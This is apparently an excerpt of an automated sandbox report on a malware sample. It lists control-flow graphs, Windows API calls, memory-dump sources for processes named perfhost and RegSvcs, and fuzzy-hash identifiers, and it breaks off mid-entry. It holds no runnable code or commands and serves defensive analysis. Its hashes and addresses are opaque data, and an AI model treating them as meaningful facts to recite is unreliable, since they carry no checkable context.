control_flow_graph (interactive graph not preserved in text): basic blocks 703a79-703c94; MultiByteToWideChar in blocks 703aba-703ade and 703b4e-703b61; WideCharToMultiByte in 703c4d-703c5d; subcalls to 703f8c, 70419d, 70288a, 704330, 7018a7 and 702bac
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00703CCA,?,?,00000000), ref: 00703AD3
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00703CCA,?,?,00000000,?,?,?), ref: 00703B59
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00703C53
• __freea.LIBCMT ref: 00703C60
  • Part of subcall function 0070288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007028BC
• __freea.LIBCMT ref: 00703C69
• __freea.LIBCMT ref: 00703C8E
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 326ccd53df0ee620fca293b58706a839221877c12d29257857da602a7cf42670
• Instruction ID: 628bff02f05d377261807aec00bd1b1dab6dba980c57455621f9d25626970c34
• Opcode Fuzzy Hash: 326ccd53df0ee620fca293b58706a839221877c12d29257857da602a7cf42670
• Instruction Fuzzy Hash: 7E51C1B2A00216EBEB258F64CC85EBB77EEEB40750F144729F904E61C0EB38DE50D660

Control-flow Graph

control_flow_graph (interactive graph not preserved in text): basic blocks 700deb-700e6e; GetLastError in block 700deb-700dff; SetLastError in 700e56-700e61 and 700e62-700e6e; subcalls to 701796, 7015c9, 7017ec, 701626, 700d27 and 701586
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 4abfccb8620476b2f48a931ab180507e69f38f1e6606efc5840cd607ae661d0a
• Instruction ID: ff6172b76ddc7244bea1cbbce751250b097388690e6cdfbee2e27b370e5b2bb6
• Opcode Fuzzy Hash: 4abfccb8620476b2f48a931ab180507e69f38f1e6606efc5840cd607ae661d0a
• Instruction Fuzzy Hash: 45F0F436104A01E6D6123378EC0EB6B22D98BC1771F698B18FA04B61D2FE6D8C0141A9

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 12083 703552-70357a GetModuleHandleExW 12084 70357c-70358f GetProcAddress 12083->12084 12085 70359f-7035a3 12083->12085 12086 703591-70359c 12084->12086 12087 70359e 12084->12087 12088 7035a5-7035a8 FreeLibrary 12085->12088 12089 7035ae-7035bb call 70419d 12085->12089 12086->12087 12087->12085 12088->12089
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00703503,00000003,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002), ref: 00703572
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00703585
• FreeLibrary.KERNEL32(00000000,?,?,?,00703503,00000003,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002,00000000), ref: 007035A8
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 33ac2dbe40461a0a904401a40643da27f18e82b75aea49aa620a784993660e80
• Instruction ID: 44c022d556464a99c939bc8afd034ead413c32c4cf4505737f2ba8048e277ac8
• Opcode Fuzzy Hash: 33ac2dbe40461a0a904401a40643da27f18e82b75aea49aa620a784993660e80
• Instruction Fuzzy Hash: A3F03170A0021DFBCB119F65DC0AB9DBBB9EF48751F008265F905A21A0DF785A90CA54

Control-flow Graph

APIs
• GetLastError.KERNEL32(00000008,?,?,00700B68,0070324B,?,007012BA,?,?,00000000), ref: 00700E74
• _free.LIBCMT ref: 00700EA9
• _free.LIBCMT ref: 00700ED0
• SetLastError.KERNEL32(00000000,?,007012BA,?,?,00000000), ref: 00700EDD
• SetLastError.KERNEL32(00000000,?,007012BA,?,?,00000000), ref: 00700EE6
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: fe3ca1ea104678cacff56a8d1b7c0287cb90710f3197e6fd1c885f8099b73e82
• Instruction ID: de3d56eeae8d14684e0967f4f305eee5331fe653063da88ef1689b603a0b6be6
• Opcode Fuzzy Hash: fe3ca1ea104678cacff56a8d1b7c0287cb90710f3197e6fd1c885f8099b73e82
• Instruction Fuzzy Hash: 6A01D176200A01EBD3127678DC8DB2B22D98BC1378F694B25F904B22D2FE7D8C0541A4

Control-flow Graph

APIs
• _free.LIBCMT ref: 00702719
  • Part of subcall function 00701626: HeapFree.KERNEL32(00000000,00000000,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?), ref: 0070163C
  • Part of subcall function 00701626: GetLastError.KERNEL32(?,?,00702798,?,00000000,?,00000000,?,007027BF,?,00000007,?,?,00701C27,?,?), ref: 0070164E
• _free.LIBCMT ref: 0070272B
• _free.LIBCMT ref: 0070273D
• _free.LIBCMT ref: 0070274F
• _free.LIBCMT ref: 00702761
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 8aeb39a074a8b43ebfa4baeafdc69b77cada8e206853f1e3db516cf39910f8db
• Instruction ID: dcadd6b3fcac40a7c09d66e7c7637dc17ec05fcc35178daf85b59815132cb8d8
• Opcode Fuzzy Hash: 8aeb39a074a8b43ebfa4baeafdc69b77cada8e206853f1e3db516cf39910f8db
• Instruction Fuzzy Hash: 1FF04F33504600EBC624EB5CEDCDC5A73D9EA04710BA8AA45F90CD76D2CB2DFC8187A9

Control-flow Graph

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00702ADC
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00702B65
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00702B77
• __freea.LIBCMT ref: 00702B80
  • Part of subcall function 0070288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007028BC
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: fb79e699f29506167a5c0f1893a66ff1e61165bd78c280fb6507e0d312f311b3
• Instruction ID: 7bb0baf5b991aafb5cdee421646c3b2ccf0f05975714b71500593ad2d221e348
• Opcode Fuzzy Hash: fb79e699f29506167a5c0f1893a66ff1e61165bd78c280fb6507e0d312f311b3
• Instruction Fuzzy Hash: EB3172B2A0021ADBDF25DF64DC89DAF7BE5EB40710B144269FC04D61A2EB39DD51CB90

Control-flow Graph

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00700B68,00000000,00000000,?,007016C2,00700B68,00000000,00000000,00000000,?,00701813,00000006,FlsSetValue), ref: 0070174D
• GetLastError.KERNEL32(?,007016C2,00700B68,00000000,00000000,00000000,?,00701813,00000006,FlsSetValue,00715FC4,FlsSetValue,00000000,00000364,?,00700EBD), ref: 00701759
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007016C2,00700B68,00000000,00000000,00000000,?,00701813,00000006,FlsSetValue,00715FC4,FlsSetValue,00000000), ref: 00701767
Memory Dump Source
• Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: fd1b445854dd6d816831a8bc474343e5a6bc916c7c54facc8c9a9e25cf342838
• Instruction ID: 08988b1ac599ca519c12860495e4c727e55c909e4c4404c3bf45f9cf8c534bc8
• Opcode Fuzzy Hash: fd1b445854dd6d816831a8bc474343e5a6bc916c7c54facc8c9a9e25cf342838
• Instruction Fuzzy Hash: CD01DB36741227EBC7218B78EC88A6677D8AF45BA17615720F915D72D1DB28D800C7F4

Execution Graph

Execution Coverage: 16%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 18.1%
Total number of Nodes: 72
Total number of Limit Nodes: 12
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: (o]q$(o]q$(o]q$(o]q$,aq$,aq$Haq
• API String ID: 0-105717579
• Opcode ID: 82fd635e510f9925e6016e531fa304961868f5500f9a5d84e633b56930bb34ba
• Instruction ID: 9b3ea091d47a88d79e3ffc8d410fc6e258c7b7ec7d39e9f6127f470bce50e59b
• Opcode Fuzzy Hash: 82fd635e510f9925e6016e531fa304961868f5500f9a5d84e633b56930bb34ba
• Instruction Fuzzy Hash: D7728070A002199FDB15CF69C884AAEBBF6FF88301F558469E909DB395DB34DC46CB90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 411 19a4348-19a4368 413 19a436a 411->413 414 19a436f-19a444c call 19a3168 call 19a2c88 411->414 413->414 424 19a444e 414->424 425 19a4453-19a4474 call 19a4613 414->425 424->425 426 19a447a-19a4485 425->426 427 19a448c-19a4490 426->427 428 19a4487 426->428 429 19a4492-19a4493 427->429 430 19a4495-19a449c 427->430 428->427 433 19a44b4-19a44f8 429->433 431 19a449e 430->431 432 19a44a3-19a44b1 430->432 431->432 432->433 437 19a455e-19a4575 433->437 439 19a44fa-19a4510 437->439 440 19a4577-19a459c 437->440 443 19a453a 439->443 444 19a4512-19a451e 439->444 449 19a459e-19a45b3 440->449 450 19a45b4 440->450 448 19a4540-19a455d 443->448 446 19a4528-19a452e 444->446 447 19a4520-19a4526 444->447 451 19a4538 446->451 447->451 448->437 449->450 452 19a45b5 450->452 451->448 452->452
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
• API String ID: 0-1229222154
• Opcode ID: 8695765e983f064848bfc89ecee55f12d0cab717b9accf11fa79002ded865ac7
• Instruction ID: 5d2f69892ea100629387e7f1812bba3728eb62c06fc2d3217bb847d4ed575df7
• Opcode Fuzzy Hash: 8695765e983f064848bfc89ecee55f12d0cab717b9accf11fa79002ded865ac7
• Instruction Fuzzy Hash: D081B274E00218CFDB18CFAAD984A9DBBF2BF88301F54D069E819AB365DB749945CF50

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1440 19a4328-19a4332 1442 19a4339-19a433a 1440->1442 1443 19a4334-19a4338 1440->1443 1444 19a433c 1442->1444 1445 19a4341-19a4342 1442->1445 1443->1442 1444->1445 1446 19a4349-19a4368 1445->1446 1447 19a4344-19a4348 1445->1447 1449 19a436a 1446->1449 1450 19a436f-19a444c call 19a3168 call 19a2c88 1446->1450 1447->1446 1449->1450 1460 19a444e 1450->1460 1461 19a4453-19a4474 call 19a4613 1450->1461 1460->1461 1462 19a447a-19a4485 1461->1462 1463 19a448c-19a4490 1462->1463 1464 19a4487 1462->1464 1465 19a4492-19a4493 1463->1465 1466 19a4495-19a449c 1463->1466 1464->1463 1469 19a44b4-19a44f8 1465->1469 1467 19a449e 1466->1467 1468 19a44a3-19a44b1 1466->1468 1467->1468 1468->1469 1473 19a455e-19a4575 1469->1473 1475 19a44fa-19a4510 1473->1475 1476 19a4577-19a459c 1473->1476 1479 19a453a 1475->1479 1480 19a4512-19a451e 1475->1480 1485 19a459e-19a45b3 1476->1485 1486 19a45b4 1476->1486 1484 19a4540-19a455d 1479->1484 1482 19a4528-19a452e 1480->1482 1483 19a4520-19a4526 1480->1483 1487 19a4538 1482->1487 1483->1487 1484->1473 1485->1486 1488 19a45b5 1486->1488 1487->1484 1488->1488
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 0o@p$PH]q$PH]q
• API String ID: 0-2023588385
• Opcode ID: 3218d32cad6d007a8362149f4db2e0a0d71069680da32d5f34ec4e0704f433b8
• Instruction ID: 497c97c658f08fab779223238bc678c6aad51daf93c8e19aa42e2abb8d30c78a
• Opcode Fuzzy Hash: 3218d32cad6d007a8362149f4db2e0a0d71069680da32d5f34ec4e0704f433b8
• Instruction Fuzzy Hash: 1A61E670E002489FDB18CFAAD984A9DBBF6FF89300F54C069E418AB365DB749945CF50
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: (o]q$4']q
• API String ID: 0-176817397
• Opcode ID: ceb7ad81aa5e9fb11c3ff86baadfacc0324e5651e373c0822661c1e33c357084
• Instruction ID: 3dbc71241002737872ce3ba134e6457c55086cd8b09b31a4570874702d840442
• Opcode Fuzzy Hash: ceb7ad81aa5e9fb11c3ff86baadfacc0324e5651e373c0822661c1e33c357084
• Instruction Fuzzy Hash: 78828F34A0020ADFCB15CF68C594AAEBBF6FF88314F55855AE9099B361D730ED49CB90

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 2197 68e4560-68e458f 2199 68e4596-68e462c LdrInitializeThunk 2197->2199 2200 68e4591 2197->2200 2201 68e46cb-68e46d1 2199->2201 2200->2199 2202 68e46d7-68e46ef 2201->2202 2203 68e4631-68e4644 2201->2203 2206 68e4703-68e4716 2202->2206 2207 68e46f1-68e46fe 2202->2207 2204 68e464b-68e469c 2203->2204 2205 68e4646 2203->2205 2224 68e469e-68e46ac 2204->2224 2225 68e46af-68e46c1 2204->2225 2205->2204 2208 68e471d-68e4739 2206->2208 2209 68e4718 2206->2209 2210 68e4a99-68e4b97 2207->2210 2212 68e473b 2208->2212 2213 68e4740-68e4764 2208->2213 2209->2208 2215 68e4b9f-68e4ba9 2210->2215 2216 68e4b99-68e4b9e 2210->2216 2212->2213 2220 68e476b-68e479d 2213->2220 2221 68e4766 2213->2221 2216->2215 2229 68e479f 2220->2229 2230 68e47a4-68e47e6 2220->2230 2221->2220 2224->2202 2226 68e46c8 2225->2226 2227 68e46c3 2225->2227 2226->2201 2227->2226 2229->2230 2232 68e47ed-68e47f6 2230->2232 2233 68e47e8 2230->2233 2234 68e4a1e-68e4a24 2232->2234 2233->2232 2235 68e4a2a-68e4a3d 2234->2235 2236 68e47fb-68e4820 2234->2236 2239 68e4a3f 2235->2239 2240 68e4a44-68e4a5f 2235->2240 2237 68e4827-68e485e 2236->2237 2238 68e4822 2236->2238 2248 68e4865-68e4897 2237->2248 2249 68e4860 2237->2249 2238->2237 2239->2240 2241 68e4a66-68e4a7a 2240->2241 2242 68e4a61 2240->2242 2246 68e4a7c 2241->2246 2247 68e4a81-68e4a97 LdrInitializeThunk 2241->2247 2242->2241 2246->2247 2247->2210 2251 68e48fb-68e490e 2248->2251 2252 68e4899-68e48be 2248->2252 2249->2248 2253 68e4915-68e493a 2251->2253 2254 68e4910 2251->2254 2255 68e48c5-68e48f3 2252->2255 2256 68e48c0 2252->2256 2259 68e493c-68e493d 2253->2259 2260 68e4949-68e4981 2253->2260 2254->2253 2255->2251 2256->2255 2259->2235 2261 68e4988-68e49e9 call 68e4340 2260->2261 2262 68e4983 2260->2262 2268 68e49eb 2261->2268 2269 68e49f0-68e4a14 2261->2269 2262->2261 2268->2269 2272 68e4a1b 2269->2272 2273 68e4a16 2269->2273 2272->2234 2273->2272
APIs
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: cf5e8bf3626268bf64488eff88d3deaede931bbb7988829461c28b2f784ba36a
• Instruction ID: bdca13474183d2dcbebd02dcab00cc2e252696887ca207787d0d408a1cc49e36
• Opcode Fuzzy Hash: cf5e8bf3626268bf64488eff88d3deaede931bbb7988829461c28b2f784ba36a
• Instruction Fuzzy Hash: 9CF1D274E01218CFDB54DFA9D884B9DBBF2BF89304F5481A9E808AB355DB34A985CF50

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 2274 19a2dd1-19a2ded 2275 19a2def-19a2df1 2274->2275 2276 19a2df6-19a2e06 2274->2276 2277 19a3094-19a309b 2275->2277 2278 19a2e08 2276->2278 2279 19a2e0d-19a2e1d 2276->2279 2278->2277 2281 19a307b-19a3089 2279->2281 2282 19a2e23-19a2e31 2279->2282 2285 19a309c-19a315e 2281->2285 2287 19a308b-19a308f call 19a02a8 2281->2287 2282->2285 2286 19a2e37 2282->2286 2363 19a3160-19a3161 2285->2363 2364 19a3165-19a3182 2285->2364 2286->2285 2288 19a2f3a-19a2f62 2286->2288 2289 19a2e7b-19a2e9d 2286->2289 2290 19a2e3e-19a2e50 2286->2290 2291 19a2fd6-19a2ffc 2286->2291 2292 19a2f14-19a2f35 2286->2292 2293 19a2f94-19a2fd1 2286->2293 2294 19a2e55-19a2e76 2286->2294 2295 19a2ec8-19a2ee9 2286->2295 2296 19a2eee-19a2f0f 2286->2296 2297 19a302f-19a304a call 19a02b8 2286->2297 2298 19a306f-19a3079 2286->2298 2299 19a304c-19a306d call 19a18c8 2286->2299 2300 19a2ea2-19a2ec3 2286->2300 2301 19a3001-19a302d 2286->2301 2302 19a2f67-19a2f8f 2286->2302 2287->2277 2288->2277 2289->2277 2290->2277 2291->2277 2292->2277 2293->2277 2294->2277 2295->2277 2296->2277 2297->2277 2298->2277 2299->2277 2300->2277 2301->2277 2302->2277 2363->2364 2366 19a3189-19a3291 call 19a16c8 call 19a16d8 call 19a16e8 call 19a16f8 call 19a02c4 2364->2366 2367 19a3184 2364->2367 2385 19a3297-19a3327 2366->2385 2367->2366
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: Xaq$$]q
• API String ID: 0-1280934391
• Opcode ID: 995fb3619511aa8ec60c49f005aaade6e393c5569322372bb89c42163ecb2f81
• Instruction ID: d9b9405fe173fd77380b6bdeb9f09b40a9c31081514ac9d84dc871f3e16103e4
• Opcode Fuzzy Hash: 995fb3619511aa8ec60c49f005aaade6e393c5569322372bb89c42163ecb2f81
• Instruction Fuzzy Hash: 05F15034F00218DFCB18DFB9D8545AEBBB6BF88710B548869E40AEB354DF359906CB91
APIs
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 89255fb8a1eba9d82317e4d79f101befa887ce7ef145e918bc7c599ea7455414
• Instruction ID: eb8d56caaeb9dd58ec1f62f26598ce7ca136ea60eeb16a91770a248b2b5961f2
• Opcode Fuzzy Hash: 89255fb8a1eba9d82317e4d79f101befa887ce7ef145e918bc7c599ea7455414
• Instruction Fuzzy Hash: D191D271F002198FDB68DFB9C8556AEBBF6AF89314F10856AD409E7395DB308D06CB90
APIs
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a34bac3e7e354a3151dfa7509df08b72ffa780d93c7b99897e05c381a75c40bb
• Instruction ID: 7829189df5e31dd826e7df2454e23b56f4a5cb4794e0fe873683579fbbece17d
• Opcode Fuzzy Hash: a34bac3e7e354a3151dfa7509df08b72ffa780d93c7b99897e05c381a75c40bb
• Instruction Fuzzy Hash: C53104B1D016189BEB28CFAAD9847DDFBF2BF89314F14C12AD418A72A4DB740945CF00
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 436d3d5609368bf37968738d15286db2fde9a9625bd89a7fcfe592661e719bcb
• Instruction ID: a38a6067447b270a78568673ceda2a288f6e4351966847b3a893de104340e4be
• Opcode Fuzzy Hash: 436d3d5609368bf37968738d15286db2fde9a9625bd89a7fcfe592661e719bcb
• Instruction Fuzzy Hash: 99E1C074E01218CFEB64DFA5D944B9DBBB2BF89304F2080AAD808A7394DB755E85CF51
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bbf3540ab467c2a3cc2f281758b872b09a3d8983ef6d11a39d3cb342f6f1d2a6
                                                                                                                                                                                • Instruction ID: a453995be3a68f06e66ecac35ba4c7d38076681e28f01f305d8273c5ed93615e
                                                                                                                                                                                • Opcode Fuzzy Hash: bbf3540ab467c2a3cc2f281758b872b09a3d8983ef6d11a39d3cb342f6f1d2a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 78D1B074E00218CFEB14DFA5D984BADBBB6EF89304F6080A9D809A7355DB359E85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f53486616f5c257a64df0e26a9281dab6680bb1ad5ed91d4d35c3fff34aa8ae8
                                                                                                                                                                                • Instruction ID: 231e6658542a4a0ff80c9f7e62c39fe94aea36c6d7789d288860471424fc19b3
                                                                                                                                                                                • Opcode Fuzzy Hash: f53486616f5c257a64df0e26a9281dab6680bb1ad5ed91d4d35c3fff34aa8ae8
                                                                                                                                                                                • Instruction Fuzzy Hash: FAA11670D002088FEB14DFA9C958BDDBBB5FF49300F648269E509AB392DB749985CF91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ef9e610d577760e469ca4f46a99a8596551676d150bb47651df0e7f8dfdab482
                                                                                                                                                                                • Instruction ID: 657c09c5684d025067882dbe0e84cfedb9318dc4febd06e692ea6ada136ca51b
                                                                                                                                                                                • Opcode Fuzzy Hash: ef9e610d577760e469ca4f46a99a8596551676d150bb47651df0e7f8dfdab482
                                                                                                                                                                                • Instruction Fuzzy Hash: E8A10370D002088FEB14DFA9C598BDDBBB5BF89301F248269E509AB391DB749985CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a60b2aedd27d8d468c6a6c52b414585299aff457110da75f4909d920eb02ab56
                                                                                                                                                                                • Instruction ID: f739c3cfd885c615b1c357841a6c75620c23a09d78d99453358d29e1592a365e
                                                                                                                                                                                • Opcode Fuzzy Hash: a60b2aedd27d8d468c6a6c52b414585299aff457110da75f4909d920eb02ab56
                                                                                                                                                                                • Instruction Fuzzy Hash: 0891F370900218CFEB14DFA8C988BDDBBB5FF49301F248269E409AB392DB759985CF54

                                                                                                                                                                                 Control-flow Graph (graph rendering not reproduced; executed/not-executed basic-block edge list omitted)
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                                                                • API String ID: 0-1435242062
                                                                                                                                                                                • Opcode ID: 184545df36963abc63bdfcde7cc2a256ca626c643e11571b8097b0555b083987
                                                                                                                                                                                • Instruction ID: e720a28756b5d9ceda2c161a7e67d3536414b7c70d2eb0f8534864c83e72c470
                                                                                                                                                                                • Opcode Fuzzy Hash: 184545df36963abc63bdfcde7cc2a256ca626c643e11571b8097b0555b083987
                                                                                                                                                                                • Instruction Fuzzy Hash: 85128D30A006098FCB15CF69D984A9EBFF6FF88311F598569E909DB261DB30EC45CB90

                                                                                                                                                                                 Control-flow Graph (graph rendering not reproduced; executed/not-executed basic-block edge list omitted)
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                                                                • API String ID: 0-4015495023
                                                                                                                                                                                • Opcode ID: aba4dc235b204baea54ed6e46730b69080cd40dd2110b9543cdcbb59e1ec2b30
                                                                                                                                                                                • Instruction ID: 20465e735eb5993eb9c003bae55e90b1bbe881c852e77471cc1e283784b30f36
                                                                                                                                                                                • Opcode Fuzzy Hash: aba4dc235b204baea54ed6e46730b69080cd40dd2110b9543cdcbb59e1ec2b30
                                                                                                                                                                                • Instruction Fuzzy Hash: F712F4399953DADBC7018BB48C941ACFBB0BFC5310B19499AC4E067281DB7F6885E7D2

                                                                                                                                                                                 Control-flow Graph (graph rendering not reproduced; executed/not-executed basic-block edge list omitted)
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
